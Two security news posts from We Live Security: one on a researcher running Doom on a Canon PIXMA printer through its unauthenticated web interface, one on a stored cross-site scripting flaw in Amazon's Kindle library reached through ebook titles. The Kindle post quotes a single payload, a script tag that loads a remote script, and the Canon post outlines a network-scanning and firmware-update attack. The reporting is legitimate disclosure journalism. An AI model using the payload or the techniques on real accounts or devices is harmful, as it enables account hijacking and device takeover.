Printer giant Canon is to provide a security fix “as quickly as is feasible” after a researcher exploited vulnerabilities in one of its wireless PIXMA products to run the classic shoot ‘em up game Doom on its colour display.

Security researcher Michael Jordon told the BBC in an interview, “Running Doom: that’s real proof you control the thing. The web interface has no username and password on it.”

Digital Trends said that the vulnerability, which allows access to printer controls via an unsecured web page, highlighted the problems not just of printer security, but that of the entire emerging “internet of things.”

Canon said that all new products would have a fix added as soon as possible, and that the fix would retroactively apply to products launched from 2013 onwards.

“At Canon we work hard at securing all of our products, however with diverse and ever-changing security threats we welcome input from others to ensure our customers are as well protected as possible,” the firm said.

Printer security: Deeper worries?

A search using Shodan (a specialist search engine which finds specific types of devices connected to the internet), revealed thousands of unsecured machines connected directly to the internet.

“This interface does not require user authentication allowing anyone to connect to the interface.  At first glance the functionality seems to be relatively benign, you could print out hundreds of test pages and use up all the ink and paper, so what?” Jordon writes.

He said that the problems (and the opportunity to run Doom) arose when you use the online interface to update the firmware, and raised serious printer security issues.

Persuading the printer to run Doom took “months”, he admits, but the issue is a serious one. Even printers not directly connected to the internet can fall victim, he said, by persuading their owners to click on a bogus link.

Vulnerable to remote attack

Jordon writes, “Even if the printer is not directly accessible from the Internet, for example behind a NAT on a user’s home network or on an office intranet, the printer is still vulnerable to remote attack.”

“A colleague (thanks Paul Stone) demonstrated this by making a web page that first scans the local network for vulnerable printers (using a technique called JavaScript port scanning). Once the printer’s IP address has been found, the web page sends a request to the web interface to modify the proxy configuration and trigger a firmware update.”

The post Printer security: Canon offers ‘fix’ after researcher plays Doom appeared first on We Live Security.

Pirating ebooks is not just bad for the publishing industry: free ebooks available online can also be used to hack into Amazon accounts via the retail giant’s ‘Manage Your Kindle’ page, used to deliver ebook files to Kindle Readers, according to researcher Benjamin Daniel Mussler.

Mussler writes that simply changing the title of the free ebooks allows attackers to execute code when a victim opens the ‘Kindle Library’ page in a web browser, The Digital Reader reports

“As a result, Amazon account cookies can be accessed by and transferred to the attacker and the victim’s Amazon account can be compromised,” Mussler writes.

Engadget reports that Mussler discovered the security issue last October, and the company rapidly patched it. It was reintroduced, however, when the company launched a new version of the “Manage Your Kindle” web page.

Free ebooks: a threat?

Mussler writes that the threat affects, “Everyone who uses Amazon’s Kindle Library,” but stresses that the flaw affects those who pirate free ebooks in particular.

The attack takes place, he writes, “Once an attacker manages to have an e-book (file, document, …) with a title like <script src=”https://www.example.org/script.js”></script> added to the victim’s library.”

Mussler says, “Users most likely to fall victim to this vulnerability are those who obtain e-books from untrustworthy sources (read: pirated e-books) and then use Amazon’s “Send to Kindle” service to have them delivered to their Kindle. From the supplier’s point of view, vulnerabilities like this present an opportunity to gain access to active Amazon accounts.”

Kindle users beware

The reappearance of the flaw was highlighted by the German ebook blog Alles Book. The site also produced a proof-of-concept ebook download to demonstrate that it worked. As of the time of writing, the flaw is still active, Mussler reports.

Mussler says, “Amazon chose not to respond to my subsequent email detailing the issue, and two months later, the vulnerability remains unfixed.”

The post Free ebooks warning: Pirates ‘can hack into Amazon accounts’ appeared first on We Live Security.